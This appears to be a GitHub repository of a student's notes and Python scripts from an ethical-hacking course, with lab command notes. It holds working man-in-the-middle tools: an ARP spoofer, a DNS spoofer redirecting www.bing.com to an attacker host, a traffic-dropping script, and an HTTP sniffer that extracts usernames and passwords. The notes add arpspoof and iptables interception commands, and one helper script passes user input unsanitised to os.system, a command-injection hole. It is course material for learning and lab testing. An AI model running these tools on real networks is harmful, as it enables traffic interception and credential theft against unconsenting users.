├── 10-12.md ├── 13-15.md ├── 4-6.md ├── 7-9.md ├── PDF ├── arp_spoofer.pdf ├── dns_spoofer.pdf ├── mac_changer.pdf ├── network_scanner.pdf └── packet_sniffer.pdf ├── README.md ├── arp_spoofer.py ├── dns_spoof.py ├── mac.py ├── mac1.py ├── mac2.py ├── net_cut.py ├── network_scanner.py ├── network_scanner1.py ├── network_scanner2.py ├── packet_sniffer.py └── st3g3xtract.py /10-12.md: -------------------------------------------------------------------------------- 1 | 2 | # Part 5 ARP Spoofer 3 | 4 | Python - Loops https://www.tutorialspoint.com/python/python_loops.htm 5 | 6 | Python - Exceptions Handling https://www.tutorialspoint.com/python/python_exceptions.htm 7 | 8 | 9 | 10 | Files: 11 | 12 | ##### Version 3 = [network_scanner2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner2.py) 13 | 14 | 15 | # Part 6 Packet Sniffer 16 | 17 | Files: 18 | 19 | 20 | # [Part 4, 5, 6](link) 21 | -------------------------------------------------------------------------------- /13-15.md: -------------------------------------------------------------------------------- 1 | 2 | # Part 5 ARP Spoofer 3 | 4 | Python - Loops https://www.tutorialspoint.com/python/python_loops.htm 5 | 6 | Python - Exceptions Handling https://www.tutorialspoint.com/python/python_exceptions.htm 7 | 8 | 9 | 10 | Files: 11 | 12 | ##### Version 3 = [network_scanner2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner2.py) 13 | 14 | 15 | # Part 6 Packet Sniffer 16 | 17 | Files: 18 | 19 | 20 | # [Part 4, 5, 6](link) 21 | -------------------------------------------------------------------------------- /4-6.md: -------------------------------------------------------------------------------- 1 | # Part 4 Network Scanner 2 | 3 | Presentation https://mp4-c.udemycdn.com/2018-06-27_14-03-09-933d490aa5a2d8ad41d650738e3a9862/original.pdf?e=1586873794&h=eeaab82b9a7111651f3512a030fab83c 4 | 5 | Windows WM = Passw0rd https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 6 | 7 | Scapy Documentation https://scapy.readthedocs.io/en/latest/ 8 | 9 | Scapy ARP Ping https://scapy.readthedocs.io/en/latest/usage.html#arp-ping 10 | 11 | Send and receive packets (sr) https://scapy.readthedocs.io/en/latest/usage.html#send-and-receive-packets-sr 12 | 13 | Python - Lists https://www.tutorialspoint.com/python/python_lists.htm 14 | 15 | Python escape characters https://docs.python.org/2.0/ref/strings.html 16 | 17 | Python - Dictionary https://www.tutorialspoint.com/python/python_dictionary.htm 18 | 19 | Argparse - https://docs.python.org/3.3/library/argparse.html 20 | 21 | - netdiscover -r 10.0.2.1/24 22 | 23 | - route -n 24 | 25 | Kali 2018 - perfect https://drive.google.com/file/d/1NlFB48CThvyqaif1IRu9YQu5h6yloWeY/view?usp=sharing 26 | 27 | Files: 28 | 29 | ##### Version 1 = [network_scanner.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner.py) 30 | 31 | ##### Version 2 = [network_scanner1.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner1.py) 32 | 33 | ##### Version 3 = [network_scanner2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/network_scanner2.py) 34 | 35 | # Part 5 ARP Spoofer 36 | 37 | Python - Loops https://www.tutorialspoint.com/python/python_loops.htm 38 | 39 | Python - Exceptions Handling https://www.tutorialspoint.com/python/python_exceptions.htm 40 | 41 | - arp -a 42 | 43 | - arpspoof -i eth0 -t 10.0.2.7 10.0.2.1 against victim 44 | 45 | - arpspoof -i eth0 -t 10.0.2.1 10.0.2.7 against router 46 | 47 | - echo 1 > / proc/sys/net/ipv4/ip_forward port forwarding 48 | 49 | - route -n # router ip 50 | 51 | Files: 52 | 53 | ##### Version 1 = [arp_spoofer.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/arp_spoofer.py) 54 | 55 | 56 | # Part 6 Packet Sniffer 57 | 58 | Build your own tools - Sniff Function - https://scapy.readthedocs.io/en/latest/extending.html 59 | 60 | Scapy HTTP https://github.com/invernizzi/scapy-http 61 | 62 | Berkeley Packet Filter (BPF) syntax https://biot.com/capstats/bpf.html 63 | 64 | Logins for testing: 65 | 66 | - http://testphp.vulnweb.com/login.php 67 | 68 | - http://www.stealmylogin.com/demo.html 69 | 70 | Files: 71 | 72 | ##### Version 1 = [packet_sniffer.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/packet_sniffer.py) 73 | 74 | # [Part 7, 8, 9](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/7-9.md) 75 | -------------------------------------------------------------------------------- /7-9.md: -------------------------------------------------------------------------------- 1 | 2 | # Part 7 DNS Spoofer 3 | 4 | echo 1 > / proc/sys/net/ipv4/ip_forward #port forwarding 5 | 6 | iptables -I FORWARD -j NFQUEUE --queue-num 0 7 | 8 | ##### capture packets 9 | 10 | pip install netfilterqueue 11 | 12 | sudo apt-get install python-netfilterqueue 13 | 14 | ##### local 15 | 16 | 17 | iptables -I OUTPUT-j NFQUEUE --queue-num 0 18 | 19 | iptables -I INPUT -j NFQUEUE --queue-num 0 20 | ##### remove rules 21 | 22 | iptables --flush 23 | 24 | service apache2 start 25 | 26 | /var/www/html 27 | 28 | ping -c 1 www.bing.com 29 | 30 | Files: 31 | 32 | ##### Version 1 = [net_cut.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/net_cut.py) 33 | 34 | ##### Version 1 = [dns_spoof.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/dns_spoof.py) 35 | 36 | # Part 8 File Interceptor 37 | 38 | Files: 39 | 40 | 41 | # Part 9 Writing a Code Injector 42 | 43 | # [Part 10, 11, 12](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/10-12.md) 44 | -------------------------------------------------------------------------------- /PDF/arp_spoofer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/arp_spoofer.pdf -------------------------------------------------------------------------------- /PDF/dns_spoofer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/dns_spoofer.pdf -------------------------------------------------------------------------------- /PDF/mac_changer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/mac_changer.pdf -------------------------------------------------------------------------------- /PDF/network_scanner.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/network_scanner.pdf -------------------------------------------------------------------------------- /PDF/packet_sniffer.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/6103f063433060f67f25dcc31ca1be237bcbd2db/PDF/packet_sniffer.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Snippets and notes from course: Learn Python and Ethical Hacking 2 | 3 | # Part 2 Mac Changer 4 | 5 | Snippets and notes from https://www.udemy.com/course/learn-python-and-ethical-hacking-from-scratch/ 6 | 7 | Kali for this course https://zsecurity.org/download-custom-kali/ 8 | 9 | List of linux commands https://www.mediacollege.com/linux/command/linux-command.html 10 | 11 | Mac Changer Presentation https://mp4-a.udemycdn.com/2018-06-27_14-02-56-bb5df79fb3b6893871cc2e2116b50c37/original.pdf?4brs5qRNTVIShYJrfmyFmz8LpbXT2ZUfnEIPD9vBSdmlJYpTO9xHpvyhwxQeGE5JWvet8hug6vuGa1zlC7MPhJXbETBvIs8giNyLPWwXV6blIwEK3BasayjPZUjAemENbB3yDlvF_NUpY22RdT8HjFO_WqLrroskCZuz5nLAIf4 12 | 13 | Subprocess https://docs.python.org/2/library/subprocess.html 14 | 15 | Variables tutorialspoint.com/python/python_variable_types.htm 16 | 17 | Strings https://www.tutorialspoint.com/python/python_strings.htm 18 | 19 | Functions https://docs.python.org/2/library/functions.html#raw_input 20 | 21 | Opt parse https://docs.python.org/2/library/optparse.html 22 | 23 | Desigion Making https://www.tutorialspoint.com/python/python_decision_making.htm 24 | 25 | Files: 26 | 27 | ##### Version 1 = [mac.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/mac.py) 28 | 29 | ##### Version 2 = [mac1.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/mac1.py) 30 | 31 | ##### Variation 1 = [st3g3xtract.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/st3g3xtract.py) 32 | 33 | # Part 3 Mac Changer Algorhitm Design 34 | 35 | Check_call() https://docs.python.org/2/library/subprocess.html 36 | 37 | Regular expressions https://www.tutorialspoint.com/python/python_reg_expressions.htm 38 | 39 | Regular expressions https://pythex.org/ 40 | 41 | Re module https://docs.python.org/2/library/re.html 42 | 43 | Files: 44 | 45 | ##### Version 3 = [mac2.py](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/mac2.py) 46 | 47 | # [Part 4, 5, 6](https://github.com/n3m351d4/Snippets-and-notes-from-course-Learn-Python-Ethical-Hacking/blob/master/4-6.md) 48 | -------------------------------------------------------------------------------- /arp_spoofer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import scapy.all as scapy 4 | import time 5 | 6 | 7 | def get_mac(ip): 8 | arp_request = scapy.ARP(pdst=ip) 9 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 10 | arp_request_broadcast = broadcast / arp_request 11 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 12 | 13 | 14 | def spoof(target_ip, spoof_ip): 15 | target_mac = get_mac(target_ip) 16 | packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) 17 | scapy.send(packet, verbose=False) # verbose - dont flood on screen 18 | # scapy.ls(scapy.ARP) - to see what packet consist of 19 | # psrc - router IP 20 | # op Short enum field - ARP response 21 | # print(packet.show()) 22 | # print(packet.summary()) 23 | 24 | 25 | def restore(destination_ip, source_ip): 26 | destination_mac = get_mac(destination_ip) 27 | source_mac = get_mac(source_ip) 28 | packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac) 29 | # target_mac="08:00:27:ee:32:d7" 30 | scapy.send(packet, count=4, verbose=False) 31 | 32 | 33 | target_ip = "192.168.1.79" 34 | gateway_ip = "192.168.1.254" 35 | 36 | try: 37 | sent_packets_count = 0 38 | while True: 39 | spoof(target_ip, gateway_ip) 40 | # we are router 41 | spoof(gateway_ip, target_ip) 42 | # we are client 43 | sent_packets_count = sent_packets_count + 2 44 | print("\r[+] Packets sent: " + str(sent_packets_count), end="") 45 | # dynamic printing 46 | time.sleep(2) 47 | except KeyboardInterrupt: 48 | print("\n[+] Detected CTRL + C . . . . . Quitting.") 49 | restore(target_ip, gateway_ip) 50 | restore(gateway_ip, target_ip) 51 | -------------------------------------------------------------------------------- /dns_spoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | import scapy.all as scapy 4 | 5 | 6 | def process_packet(packet): 7 | scapy_packet = scapy.IP(packet.get_payload()) 8 | if scapy_packet.haslayer(scapy.DNSRR): 9 | qname = scapy_packet[scapy.DNSQR].qname 10 | if "www.bing.com" in qname: 11 | print ("[+] Spoofing target") 12 | answer = scapy.DNSRR(rrname=qname, rdata="192.168.1.77") 13 | # kali 14 | scapy_packet[scapy.DNS].an = answer 15 | scapy_packet[scapy.DNS].ancount = 1 16 | 17 | del scapy_packet[scapy.IP].len 18 | del scapy_packet[scapy.IP].chksum 19 | del scapy_packet[scapy.UDP].chksum 20 | del scapy_packet[scapy.UDP].len 21 | 22 | packet.set_payload(str(scapy_packet)) 23 | 24 | packet.accept() 25 | 26 | 27 | queue = netfilterqueue.NetfilterQueue() 28 | queue.bind(0, process_packet) 29 | queue.run() 30 | -------------------------------------------------------------------------------- /mac.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | # OS commands 5 | import optparse 6 | # user input commands 7 | 8 | 9 | parser = optparse.OptionParser() 10 | parser.add_option("-i", "--interface", dest="interface", help="Interface to change it's MAC address") 11 | parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") 12 | (options, arguments) = parser.parse_args() 13 | # capture arguments and options from user input, "-i" - option, "interface" - argument 14 | # options then arguments, contains user input options.new_mac 15 | 16 | # ctrl+d duplicate string 17 | # ctrl+/ comment string 18 | 19 | # variables: 20 | # interface = "eth0" 21 | # new_mac = "00:00:00:00:00:00" 22 | 23 | # variables for input - options 24 | 25 | interface = options.interface 26 | new_mac = options.new_mac 27 | 28 | # user input: 29 | # interface = input("interface > ") 30 | # new_mac = input("new MAC > ") 31 | # for python2.7 raw_input("") 32 | 33 | print("[+] Changing MAC address for " + interface + " to " + new_mac) 34 | 35 | # subprocess.call("ifconfig " + interface + " down", shell=True) 36 | # subprocess.call("ifconfig " + interface + " hw ether " + new_mac, shell=True) 37 | # subprocess.call("ifconfig " + interface + " up", shell=True) 38 | # not checking user input, just string, payload: ifconfig; ls; down (;ls;) 39 | # to execute side commands! 40 | 41 | subprocess.call(["ifconfig", interface, "down"]) 42 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 43 | subprocess.call(["ifconfig", interface, "up"]) 44 | 45 | # handling user input commands,anti-hijacking 46 | 47 | # default: 48 | # experimental: de:ad:be:ef:ca:fe 49 | -------------------------------------------------------------------------------- /mac1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import optparse 5 | 6 | 7 | def get_arguments(): 8 | parser = optparse.OptionParser() 9 | parser.add_option("-i", "--interface", dest="interface", help="Interface to change it's MAC address") 10 | parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") 11 | return parser.parse_args() 12 | # get this arguments outside 13 | 14 | 15 | def change_mac(interface, new_mac): 16 | print("[+] Changing MAC address for " + interface + " to " + new_mac) 17 | subprocess.call(["ifconfig", interface, "down"]) 18 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 19 | subprocess.call(["ifconfig", interface, "up"]) 20 | 21 | 22 | (options, arguments) = get_arguments() 23 | change_mac(options.interface, options.new_mac) 24 | # function inputs 25 | -------------------------------------------------------------------------------- /mac2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #check output 3 | import subprocess 4 | import optparse 5 | import re 6 | 7 | 8 | def get_arguments(): 9 | parser = optparse.OptionParser() 10 | parser.add_option("-i", "--interface", dest="interface", help="Interface to change it's MAC address") 11 | parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") 12 | return parser.parse_args() 13 | # get this arguments outside 14 | 15 | 16 | def change_mac(interface, new_mac): 17 | print("[+] Changing MAC address for " + interface + " to " + new_mac) 18 | subprocess.call(["ifconfig", interface, "down"]) 19 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 20 | subprocess.call(["ifconfig", interface, "up"]) 21 | 22 | 23 | def get_current_mac(interface): 24 | ifconfig_result = subprocess.check_output(["ifconfig", interface]) 25 | mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result) 26 | 27 | if mac_address_search_result: 28 | return mac_address_search_result.group(0) 29 | else: 30 | print( 31 | "[-] Could not read Mac address.") # to execute programm without errors, lo interface doesn't have MAC adress 32 | 33 | 34 | (options, arguments) = get_arguments() 35 | current_mac = get_current_mac(options.interface) 36 | print("Current MAC = " + str(current_mac)) 37 | change_mac(options.interface, options.new_mac) 38 | # function inputs 39 | current_mac = get_current_mac(options.interface) 40 | if current_mac == options.new_mac: 41 | print("[+] MAC address was successfully changed to " + current_mac) 42 | else: 43 | print("[-] MAC address did not get changed.") 44 | -------------------------------------------------------------------------------- /net_cut.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | 4 | 5 | def process_packet(packet): 6 | print(packet) 7 | packet.drop() 8 | 9 | 10 | queue = netfilterqueue.NetfilterQueue() 11 | queue.bind(0, process_packet) 12 | queue.run() 13 | -------------------------------------------------------------------------------- /network_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | 5 | 6 | def scan(ip): 7 | # list clients of the network and MAC addresses 8 | # scapy.arping(ip) can take IP ranges 9 | arp_request = scapy.ARP(pdst=ip) 10 | # arp_request.show() 11 | # print(arp_request.summary()) 12 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 13 | # set destination MAC to broadcast 14 | arp_request_broadcast = broadcast / arp_request 15 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 16 | # send packets combined of parts and receive response, answered_list and unanswered_list 17 | print("__________________________________________\nIP\t\t\tMAC Address\n------------------------------------------") 18 | for element in answered_list: 19 | print(element[1].psrc + "\t\t" + element[1].hwsrc) 20 | # parse the values 21 | 22 | 23 | scan("192.168.1.254/24") 24 | # 192.168.1.77/24 my IP 25 | -------------------------------------------------------------------------------- /network_scanner1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | 5 | 6 | def scan(ip): 7 | arp_request = scapy.ARP(pdst=ip) 8 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 9 | arp_request_broadcast = broadcast / arp_request 10 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 11 | clients_list = [] 12 | for element in answered_list: 13 | client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} 14 | clients_list.append(client_dict) 15 | return clients_list 16 | 17 | 18 | def print_result(results_list): 19 | print("__________________________________________\nIP\t\t\tMAC Address\n------------------------------------------") 20 | for client in results_list: 21 | print(client["ip"] + "\t\t" + client["mac"]) 22 | 23 | 24 | scan_result = scan("192.168.1.254/24") 25 | print_result(scan_result) 26 | -------------------------------------------------------------------------------- /network_scanner2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import scapy.all as scapy 4 | import argparse 5 | 6 | 7 | def get_arguments(): 8 | parser = argparse.ArgumentParser() 9 | parser.add_argument("-t", "--target", dest="target", help="Target IP / IP range.") 10 | options = parser.parse_args() 11 | return options 12 | 13 | 14 | def scan(ip): 15 | arp_request = scapy.ARP(pdst=ip) 16 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 17 | arp_request_broadcast = broadcast / arp_request 18 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 19 | clients_list = [] 20 | for element in answered_list: 21 | client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} 22 | clients_list.append(client_dict) 23 | return clients_list 24 | 25 | 26 | def print_result(results_list): 27 | print("__________________________________________\nIP\t\t\tMAC Address\n------------------------------------------") 28 | for client in results_list: 29 | print(client["ip"] + "\t\t" + client["mac"]) 30 | 31 | 32 | options = get_arguments() 33 | scan_result = scan(options.target) 34 | print_result(scan_result) 35 | -------------------------------------------------------------------------------- /packet_sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import scapy.all as scapy 4 | from scapy.layers import http 5 | 6 | 7 | def sniff(interface): 8 | scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) 9 | # prn = callback function filter = "port 21", "tcp", "udp" 10 | 11 | 12 | def get_url(packet): 13 | return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path 14 | 15 | 16 | def get_login_info(packet): 17 | if packet.haslayer(scapy.Raw): 18 | load = packet[scapy.Raw].load 19 | keywords = ["username", "user", "login", "password", "pass"] 20 | for keyword in keywords: 21 | if keyword in load: 22 | return load 23 | 24 | 25 | def process_sniffed_packet(packet): 26 | if packet.haslayer(http.HTTPRequest): 27 | url = get_url(packet) 28 | print("[+] HTTP Request >> " + url) 29 | login_info = get_login_info(packet) 30 | if login_info: 31 | print("\n\n[+] Possible username/password >> " + login_info + "\n\n") 32 | 33 | 34 | sniff("eth0") 35 | 36 | -------------------------------------------------------------------------------- /st3g3xtract.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env/python 2 | 3 | import os 4 | import optparse 5 | import subprocess 6 | import argparse 7 | 8 | 9 | # import pyfiglet 10 | 11 | def strings_check(filename, flag2grep): 12 | print("\033[1;32;10m [+] Strings checking " + filename + " grep: " + flag2grep + "\n") 13 | print("\033[0;37;10m ... \n") 14 | # ascii_banner = pyfiglet.figlet_format("I hate it") 15 | # print(ascii_banner) 16 | os.system("strings " + filename + " | grep " + flag2grep) 17 | print("\033[1;32;10m [+] Strings done \n") 18 | 19 | 20 | def foremost_check(filename): 21 | print("\033[1;32;10m [+] Trying to extract everything with foremost from " + filename + "\n") 22 | print("\033[0;37;10m ... \n") 23 | subprocess.call(["foremost", "-T", filename]) 24 | print("\033[1;32;10m [+] Foremost done \n [+] Check output folder, please \n") 25 | 26 | 27 | def binwalk_check(filename): 28 | print("\033[1;32;10m [+] Trying to extract everything with binwalk from " + filename + "\n") 29 | print("\033[0;37;10m ... \n") 30 | subprocess.call(["binwalk", "-e", filename]) 31 | print("\033[1;32;10m [+] Binwalk done \n [+] Check output folder, please \n") 32 | 33 | 34 | def get_arguments(): 35 | parser = optparse.OptionParser() 36 | parser.add_option("-f", "--filename", dest="filename", help="Name of the file to check") 37 | parser.add_option("-F", "--flag2grep", dest="flag2grep", help="Word or command to use with grep") 38 | parser.add_option("-b", "--binwalk", dest="binwalk", action="store_true", help="Use binwalk") 39 | parser.add_option("-o", "--foremost", dest="foremost", action="store_true", help="Use foremost") 40 | parser.add_option("-s", "--strings", dest="strings", action="store_true", help="Use strings with grep") 41 | return parser.parse_args() 42 | 43 | 44 | (options, arguments) = get_arguments() 45 | if options.binwalk: 46 | binwalk_check(options.filename) 47 | if options.foremost: 48 | foremost_check(options.filename) 49 | if options.strings: 50 | strings_check(options.filename, options.flag2grep) 51 | else: 52 | binwalk_check(options.filename) 53 | foremost_check(options.filename) 54 | strings_check(options.filename, options.flag2grep) 55 | --------------------------------------------------------------------------------